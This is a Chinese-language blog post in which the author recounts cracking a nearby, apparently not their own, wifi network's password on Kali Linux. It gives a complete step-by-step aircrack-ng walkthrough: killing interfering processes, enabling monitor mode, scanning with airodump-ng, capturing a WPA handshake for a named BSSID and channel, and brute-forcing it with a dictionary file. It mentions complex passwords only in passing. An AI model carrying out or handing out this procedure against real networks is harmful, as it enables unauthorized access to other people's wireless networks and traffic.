這些天通過上網查看各類博客,資料,再加上動手操作,成功在Kali Linux 2.0上面破解了附近壹個wifi的密碼,下面對其大體步驟進行總結:
1.ifconfig -a
使用該命令查看本機的無線網卡
2.ifconfig
使用該命令查看本機已啟動的無線網卡
可以發現wlan1,這壹網卡並沒有顯示在上面.如果想使用它進行下面的破解密碼操作,首先使用ifconfig wlan1 up啟動它.
3.airmon-ng check kill
使用該命令kill壹些會影響接下來的操作的進程
4.airmon-ng start wlan0
使用該命令使wlan0網卡開啟monitor mode
5.airodump-ng wlan0mon
使用該命令查看附近的無線網絡
選擇壹個妳想破解密碼的無線網絡,記下它的BSSID、CH(channel),下面的命令會用到. BSSID STATION PWR RATE......下面顯示的是有終端連接的無線網絡.
註意最好選擇有終端連接的無線網絡,即選擇在上邊的圖片中BSSID STATION PWR RATE......下面出現的BSSID,因為這些BSSID有終端連接,如手機、平板等,
選擇這些更容易抓到handshake包(即用於連接無線網絡時發送的認證包),當然也可以選擇沒在BSSID STATION PWR RATE......下面出現的BSSID,現在沒有 終端連接,可能 在我們抓包的過程中會有終端連接進來.
6.airodump-ng --bssid F0:B4:29:29:8A:03 -c 3 -w crack wlan0mon
使用該命令抓取某個無線網絡的數據包,命令參數解釋:bssid、c為filter option;w後面的crack是存放抓取後的數據包的文件名,自定義即可.
7.等待,直到抓到handshake包
8.aircrack-ng -w /tmp/WPADict.txt crack-01.cap
使用該命令通過密碼字典文件暴力破解該無線網絡的密碼.
9.破解出密碼
如果足夠幸運即密碼字典文件中有這壹無線網絡的密碼,那麽壹段時間後(5、6個小時甚至更長都有可能)就可以找到這壹密碼.
如果密碼字典文件中沒有這壹密碼,則破解不出該無線網絡的密碼.
可以看出設計壹個復雜的密碼,可以降低被破解的幾率.
10.airmon-ng stop wlan0mon
使用該命令關閉wlan0無線網卡monitor mode